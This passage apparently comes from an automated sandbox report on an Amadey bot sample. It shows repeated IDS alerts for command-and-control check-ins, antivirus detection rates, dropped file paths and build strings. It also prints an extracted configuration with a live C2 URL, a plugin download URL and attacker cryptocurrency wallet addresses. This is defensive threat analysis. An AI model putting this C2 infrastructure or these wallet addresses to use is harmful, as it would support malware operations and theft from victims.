                              Source Port:50307
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450348802027700 02/06/23-18:38:46.302644
                              SID:2027700
                              Source Port:50348
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449866802027700 02/06/23-18:36:33.225481
                              SID:2027700
                              Source Port:49866
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450139802027700 02/06/23-18:37:50.922595
                              SID:2027700
                              Source Port:50139
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449860802027700 02/06/23-18:36:31.786991
                              SID:2027700
                              Source Port:49860
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449777802027700 02/06/23-18:36:10.512879
                              SID:2027700
                              Source Port:49777
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450228802027700 02/06/23-18:38:13.886569
                              SID:2027700
                              Source Port:50228
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449955802027700 02/06/23-18:37:01.055369
                              SID:2027700
                              Source Port:49955
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450090802027700 02/06/23-18:37:37.652979
                              SID:2027700
                              Source Port:50090
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449973802027700 02/06/23-18:37:05.465390
                              SID:2027700
                              Source Port:49973
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450240802027700 02/06/23-18:38:16.797444
                              SID:2027700
                              Source Port:50240
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450311802027700 02/06/23-18:38:35.648201
                              SID:2027700
                              Source Port:50311
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449884802027700 02/06/23-18:36:38.947006
                              SID:2027700
                              Source Port:49884
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450044802027700 02/06/23-18:37:25.381632
                              SID:2027700
                              Source Port:50044
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450222802027700 02/06/23-18:38:12.425383
                              SID:2027700
                              Source Port:50222
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450133802027700 02/06/23-18:37:48.134151
                              SID:2027700
                              Source Port:50133
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449795802027700 02/06/23-18:36:14.536822
                              SID:2027700
                              Source Port:49795
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449838802027700 02/06/23-18:36:26.789629
                              SID:2027700
                              Source Port:49838
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450151802027700 02/06/23-18:37:53.780649
                              SID:2027700
                              Source Port:50151
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449927802027700 02/06/23-18:36:52.819701
                              SID:2027700
                              Source Port:49927
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450062802027700 02/06/23-18:37:29.485225
                              SID:2027700
                              Source Port:50062
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450317802027700 02/06/23-18:38:37.080325
                              SID:2027700
                              Source Port:50317
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449726802027700 02/06/23-18:35:56.260662
                              SID:2027700
                              Source Port:49726
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449850802027700 02/06/23-18:36:29.439544
                              SID:2027700
                              Source Port:49850
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450279802027700 02/06/23-18:38:27.884547
                              SID:2027700
                              Source Port:50279
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449945802027700 02/06/23-18:36:58.654499
                              SID:2027700
                              Source Port:49945
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450149802027700 02/06/23-18:37:53.313477
                              SID:2027700
                              Source Port:50149
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450345802027700 02/06/23-18:38:44.689333
                              SID:2027700
                              Source Port:50345
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450238802027700 02/06/23-18:38:16.299287
                              SID:2027700
                              Source Port:50238
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449767802027700 02/06/23-18:36:08.035707
                              SID:2027700
                              Source Port:49767
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449749802027700 02/06/23-18:36:03.660431
                              SID:2027700
                              Source Port:49749
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449904802027700 02/06/23-18:36:43.781750
                              SID:2027700
                              Source Port:49904
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449815802027700 02/06/23-18:36:21.210734
                              SID:2027700
                              Source Port:49815
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450327802027700 02/06/23-18:38:39.273408
                              SID:2027700
                              Source Port:50327
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450250802027700 02/06/23-18:38:19.214721
                              SID:2027700
                              Source Port:50250
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450291802027700 02/06/23-18:38:30.738198
                              SID:2027700
                              Source Port:50291
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449856802027700 02/06/23-18:36:30.850298
                              SID:2027700
                              Source Port:49856
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450161802027700 02/06/23-18:37:56.171482
                              SID:2027700
                              Source Port:50161
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450072802027700 02/06/23-18:37:33.278393
                              SID:2027700
                              Source Port:50072
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450297802027700 02/06/23-18:38:32.224802
                              SID:2027700
                              Source Port:50297
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449822802027700 02/06/23-18:36:22.933332
                              SID:2027700
                              Source Port:49822
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450167802027700 02/06/23-18:37:57.576211
                              SID:2027700
                              Source Port:50167
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450256802027700 02/06/23-18:38:20.656895
                              SID:2027700
                              Source Port:50256
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449911802027700 02/06/23-18:36:48.462366
                              SID:2027700
                              Source Port:49911
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450078802027700 02/06/23-18:37:34.718345
                              SID:2027700
                              Source Port:50078
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450266802027700 02/06/23-18:38:23.033535
                              SID:2027700
                              Source Port:50266
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450355802027700 02/06/23-18:38:48.066556
                              SID:2027700
                              Source Port:50355
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449736802027700 02/06/23-18:36:00.525448
                              SID:2027700
                              Source Port:49736
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450269802027700 02/06/23-18:38:23.765845
                              SID:2027700
                              Source Port:50269
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450006802027700 02/06/23-18:37:15.979491
                              SID:2027700
                              Source Port:50006
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450358802027700 02/06/23-18:38:48.804091
                              SID:2027700
                              Source Port:50358
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449840802027700 02/06/23-18:36:27.290138
                              SID:2027700
                              Source Port:49840
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449996802027700 02/06/23-18:37:11.560689
                              SID:2027700
                              Source Port:49996
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450177802027700 02/06/23-18:37:59.985865
                              SID:2027700
                              Source Port:50177
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449825802027700 02/06/23-18:36:23.646592
                              SID:2027700
                              Source Port:49825
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449751802027700 02/06/23-18:36:04.175861
                              SID:2027700
                              Source Port:49751
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450110802027700 02/06/23-18:37:42.371968
                              SID:2027700
                              Source Port:50110
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449917802027700 02/06/23-18:36:49.905140
                              SID:2027700
                              Source Port:49917
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449739802027700 02/06/23-18:36:01.266268
                              SID:2027700
                              Source Port:49739
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449999802027700 02/06/23-18:37:14.145161
                              SID:2027700
                              Source Port:49999
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449828802027700 02/06/23-18:36:24.349767
                              SID:2027700
                              Source Port:49828
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450281802027700 02/06/23-18:38:28.378215
                              SID:2027700
                              Source Port:50281
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450192802027700 02/06/23-18:38:03.610612
                              SID:2027700
                              Source Port:50192
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450088802027700 02/06/23-18:37:37.171595
                              SID:2027700
                              Source Port:50088
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449968802027700 02/06/23-18:37:04.244029
                              SID:2027700
                              Source Port:49968
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450021802027700 02/06/23-18:37:19.783407
                              SID:2027700
                              Source Port:50021
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449901802027700 02/06/23-18:36:43.063640
                              SID:2027700
                              Source Port:49901
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449761802027700 02/06/23-18:36:06.571220
                              SID:2027700
                              Source Port:49761
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450009802027700 02/06/23-18:37:16.756199
                              SID:2027700
                              Source Port:50009
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450342802027700 02/06/23-18:38:43.108288
                              SID:2027700
                              Source Port:50342
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450212802027700 02/06/23-18:38:10.033408
                              SID:2027700
                              Source Port:50212
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449983802027700 02/06/23-18:37:08.027985
                              SID:2027700
                              Source Port:49983
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449942802027700 02/06/23-18:36:57.946569
                              SID:2027700
                              Source Port:49942
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450123802027700 02/06/23-18:37:45.530650
                              SID:2027700
                              Source Port:50123
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449853802027700 02/06/23-18:36:30.146489
                              SID:2027700
                              Source Port:49853
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449812802027700 02/06/23-18:36:20.476057
                              SID:2027700
                              Source Port:49812
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449894802027700 02/06/23-18:36:41.381593
                              SID:2027700
                              Source Port:49894
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449764802027700 02/06/23-18:36:07.304245
                              SID:2027700
                              Source Port:49764
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450253802027700 02/06/23-18:38:19.923435
                              SID:2027700
                              Source Port:50253
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450301802027700 02/06/23-18:38:33.190298
                              SID:2027700
                              Source Port:50301
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449914802027700 02/06/23-18:36:49.185768
                              SID:2027700
                              Source Port:49914
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450294802027700 02/06/23-18:38:31.479059
                              SID:2027700
                              Source Port:50294
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450075802027700 02/06/23-18:37:34.012824
                              SID:2027700
                              Source Port:50075
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450164802027700 02/06/23-18:37:56.874762
                              SID:2027700
                              Source Port:50164
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450034802027700 02/06/23-18:37:22.947074
                              SID:2027700
                              Source Port:50034
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Source: http://62.204.41.4/Gol478Ns/Plugins/clip64.dllAvira URL Cloud: Label: malware
                              Source: file.exeReversingLabs: Detection: 69%
                              Source: file.exeVirustotal: Detection: 51%Perma Link
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dllReversingLabs: Detection: 80%
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeReversingLabs: Detection: 80%
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeReversingLabs: Detection: 48%
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeReversingLabs: Detection: 80%
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeReversingLabs: Detection: 28%
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeReversingLabs: Detection: 81%
                              Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dllReversingLabs: Detection: 80%
                              Source: file.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeJoe Sandbox ML: detected
                              Source: 28.0.mnolyk.exe.70000.0.unpackMalware Configuration Extractor: Amadey {"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
                              Source: 27.2.rundll32.exe.6fb90000.0.unpackMalware Configuration Extractor: Amadey {"Wallet Addresses": ["bc1qslzv7hczpsatc8lq285gy38r4af0c3alsc4m77", "0x89E34Ee2016a5E5a97b5E9598C251D2a2746Ba0D", "LdYspWr6nkQ3ZNNTsmba77u4frHDhji1Nv", "DBjzffi3umhLQbUGLRoNQwZ4pjoKyNFahf", "42zbZM5ozb4iDSN7hxNnQ1DSAvEmGY3z2KvAYmMxSJkUCc5bJyJ5hdkUu4324VJx8ACcDJJXg2NbRdWVcDyS87tyLikjVVJ"]}
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A32F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00A32F1D
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeCode function: 1_2_00F82F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,1_2_00F82F1D

                              Compliance

                              barindex
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeUnpacked PE file: 2.2.arJf.exe.400000.0.unpack
                              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                              Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                              Source: Binary string: wextract.pdb source: file.exe, brJg.exe.0.dr
                              Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.249730772.00000000049A9000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp, xriv.exe, 0000000E.00000000.394369817.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000000F.00000000.395468637.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000000F.00000002.775153494.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001A.00000002.404223477.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001A.00000000.402551757.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001C.00000002.412679871.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001C.00000000.412460311.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001F.00000002.539131975.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001F.00000000.538897999.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 00000021.00000002.667838204.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 00000021.00000000.667524301.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe.14.dr, xriv.exe.0.dr
                              Source: Binary string: Healer.pdb source: arJf.exe, 00000002.00000002.368629241.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, arJf.exe, 00000002.00000002.368573953.0000000002180000.00000004.08000000.00040000.00000000.sdmp, arJf.exe, 00000002.00000002.368210560.0000000002000000.00000004.08000000.00040000.00000000.sdmp, arJf.exe, 00000002.00000002.368703907.0000000002631000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: wextract.pdbGCTL source: file.exe, brJg.exe.0.dr
                              Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: brJg.exe, 00000001.00000003.252066347.00000000033E5000.00000004.00000020.00020000.00000000.sdmp, brJg.exe, 00000001.00000003.251774112.0000000004E86000.00000004.00000020.00020000.00000000.sdmp, nika.exe, 0000000D.00000000.369407465.0000000000142000.00000002.00000001.01000000.00000009.sdmp, nika.exe.1.dr
                              Source: Binary string: _.pdb source: arJf.exe, 00000002.00000002.368629241.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, arJf.exe, 00000002.00000002.368210560.0000000002000000.00000004.08000000.00040000.00000000.sdmp, arJf.exe, 00000002.00000002.368703907.0000000002631000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: KC:\jovoxomexep_yuyobib\topaduseyese.pdb source: arJf.exe, 00000002.00000000.252149587.0000000000401000.00000020.00000001.01000000.00000005.sdmp, arJf.exe.1.dr
                              Source: Binary string: D:\Mktmp\Amadey\ClipperDLL\Release\CLIPPERDLL.pdb source: mnolyk.exe, 0000000F.00000002.775467476.0000000001189000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001B.00000002.775394755.000000006FB9F000.00000002.00000001.01000000.0000000D.sdmp, clip64[1].dll.15.dr, clip64.dll.15.dr
                              Source: Binary string: Healer.pdbH5 source: arJf.exe, 00000002.00000002.368629241.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, arJf.exe, 00000002.00000002.368573953.0000000002180000.00000004.08000000.00040000.00000000.sdmp, arJf.exe, 00000002.00000002.368210560.0000000002000000.00000004.08000000.00040000.00000000.sdmp, arJf.exe, 00000002.00000002.368703907.0000000002631000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: *C:\jovoxomexep_yuyobib\topaduseyese.pdb source: brJg.exe, 00000001.00000003.251774112.0000000004E51000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\jovoxomexep_yuyobib\topaduseyese.pdb source: brJg.exe, 00000001.00000003.251774112.0000000004E51000.00000004.00000020.00020000.00000000.sdmp, arJf.exe, 00000002.00000000.252149587.0000000000401000.00000020.00000001.01000000.00000005.sdmp, arJf.exe.1.dr
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Local\Temp\Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\xriv.exeJump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A32390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00A32390
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeCode function: 1_2_00F82390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00F82390
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_010BFC58 FindFirstFileExW,14_2_010BFC58

                              Networking

                              barindex
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49725 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49726 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49727 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49728 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49729 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49730 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49731 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49732 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49733 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49734 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49735 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49736 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49737 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49738 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49739 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49740 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49741 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49742 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49743 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49744 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49745 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49746 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49747 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49748 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49749 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49750 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49751 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49752 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49753 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49754 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49755 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49756 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49757 -> 62.204.41.4:80
